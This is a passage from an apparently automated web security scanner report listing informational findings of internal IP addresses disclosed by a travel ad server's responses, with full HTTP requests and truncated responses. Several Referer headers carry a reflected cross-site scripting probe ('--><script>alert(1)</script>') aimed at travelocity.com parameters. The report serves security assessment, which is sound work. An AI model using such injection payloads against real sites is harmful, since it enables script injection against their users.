Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6EC49D47AFF473B50301CAE75DBBA82B.p0529

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=0BB8AB8D28C2251561FE46210E602AEC.p0526; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.60
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe2() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...
23.43. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd&returnDate=yyyyc880d& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:10 GMT
Server: Apache
Set-Cookie: JSESSIONID=2DE5AC9EC2A518E2578C74E8A609E3A0.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...
23.44. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd&returnDate=yyyyc880d& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=EFC80F94270639BE94C078280756EC4C.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...
23.45. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
SERVICE_HOST: 10.8.5.55
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...
23.46. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd&returnDate=yyyymm9d4b7& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=EE4DDEE27F1FC0CE4875AF66953B4ADB.p0521

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=DDF80AC4443E4566A1528EFBCE4138AA.p0525; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.59
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...
23.47. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:48 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 51092

function DrfUtils() {}

DrfUtils.regexEscape = function(text) {
return text.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, "\\$&");
}
DrfUtils.isFFCompat = function() {
   if (document.addEventListener)
...[SNIP]...
23.48. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.54
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:19 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 51092

function DrfUtils() {}

DrfUtils.regexEscape = function(text) {
return text.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, "\\$&");
}
DrfUtils.isFFCompat = function() {
   if (document.addEventListener)
...[SNIP]...
23.49. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=363DEDDF73A993F4C60B78F29DDE0D70.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:48 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 473

DrfCalendar.i18n = {
   shortDayNames: [ "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"],
   dayNames: ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"],
   monthNames: ["Ja
...[SNIP]...
23.50. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=C0501070F6ED78D85CD7AA691728D8A2.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 1995

.drf-aa {background-position:-90px 0px;}
.drf-aavaca {background-position:-180px 0px;}
.drf-agoda {background-position:-270px 0px;}
.drf-aircanada {background-position:-360px 0px;}
.drf-airfare {b
...[SNIP]...
23.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=3123AB1AEF9C18D860BC374089C56E60.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 1995

.drf-aa {background-position:-90px 0px;}
.drf-aavaca {background-position:-180px 0px;}
.drf-agoda {background-position:-270px 0px;}
.drf-aircanada {background-position:-360px 0px;}
.drf-airfare {b
...[SNIP]...
23.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD319AB033A4436E8A201300E0F85D78.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Content-Length: 95623
Connection: close
Content-Type: image/png

.PNG
.
...IHDR................-...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
23.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE4DDEE27F1FC0CE4875AF66953B4ADB.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Content-Length: 95623
Connection: close
Content-Type: image/png

.PNG
.
...IHDR................-...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
23.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=26986A4704F854DBAA5915B151FBE488.p0528

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=E3F306C19851140C349EA0BB4E73716B.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Content-Length: 1291
Connection: close
Content-Type: image/gif

GIF89a|.......A#.2..............K8....=8. ..6..+..*.....%..=..I.."..XQ.@;.).,.......K1.)    .    .....~m.9 .!..2..9..:..J8.B@.E).9..?".;&.B%.;..#........ ..!.....5..I&.3..D&.9%.=%.+..=........I(.&........
...[SNIP]...
23.55. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E7500CA14FDE215C024D31D0E17145B0.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=C48818E7B47F8EDDDEDEE13932368B50.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Content-Length: 1291
Connection: close
Content-Type: image/gif

GIF89a|.......A#.2..............K8....=8. ..6..+..*.....%..=..I.."..XQ.@;.).,.......K1.)    .    .....~m.9 .!..2..9..:..J8.B@.E).9..?".;&.B%.;..#........ ..!.....5..I&.3..D&.9%.=%.+..=........I(.&........
...[SNIP]...
23.56. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
